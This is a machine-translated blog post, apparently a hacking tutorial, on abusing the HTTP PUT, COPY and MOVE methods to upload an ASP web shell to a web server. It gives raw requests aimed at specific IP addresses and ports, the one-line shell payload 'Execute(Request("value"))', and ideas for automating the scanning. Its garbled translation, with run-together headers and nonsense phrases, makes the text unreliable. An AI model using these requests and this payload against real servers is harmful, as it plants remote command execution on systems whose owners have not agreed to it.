Previous article Http-put uploading a file/shell said that he set up an environment to test http-put upload Shell. Recently encountered several put upload examples, also successfully uploaded several times, to share the thought of the secret Tatsu.
0x00 to determine if HTTP PUT is allowed
Send such a message to the server to view the server back:
options/http/1.1192.168. 9.151:8086connection:keep-aliveaccept:text/plainuser-agent: mozilla/5.05.1; ZH-CN; RV:1.9. 1) gecko/20090624 firefox/3.5
If the return value is 200, you can make the next attempt
0x10 Http-put Upload
Depending on the type of language, you need to upload different types of files, but first of all, try uploading a txt file.
Put/test.txt http/1.1Content-length:31*/*Accept-language:en-ususer-agent: mozilla/4.0 (compatible; MSIE 6.0218.94.36.38:9010<% Execute (Request ("value"))%>
If the upload is successful, no good. If unsuccessful, there may be a problem with the HTTP request header. Depending on the return code, you can refer to https://msdn.microsoft.com/en-us/library/aa142816 (v=exchg.65). aspx
After success, then upload the corresponding Trojan according to the server language:
put/test.asp http/1.1Content-length:31*/*Accept-language:en-ususer-agent: mozilla/4.0 (compatible; MSIE 6.0218.94.36.38:9010<% Execute (Request ("value"))%>
Even if the format is right, it is possible that the upload failed and the server may have made some configuration. No hurry, and look down
0x20 Http-copy/move
At this time, the first successful upload of the Test.txt file will work.
Copy/test.txt http/1.1Host:test.comDestination: HTTP://test.com/test.aspoverwrite:t
or use Move:
Move/dir_name/test.aspx http/1.1/test.aspxHost:test.com
Note that when you move, you require that two files not be in the same folder.
Probably come here, can pass up, on the pass up = = can't pass up, can try other methods of HTTP method
0x30 Other
In fact, you can consider a browser plugin or Python to write a gadget, open the page when automatically detect whether the site allows strange HTTP method or automated to upload. Follow-up, will continue to share ~ ~ ~
Good luck ~< ( ̄3 ̄) >
Http-put Uploading Files/shell (ii)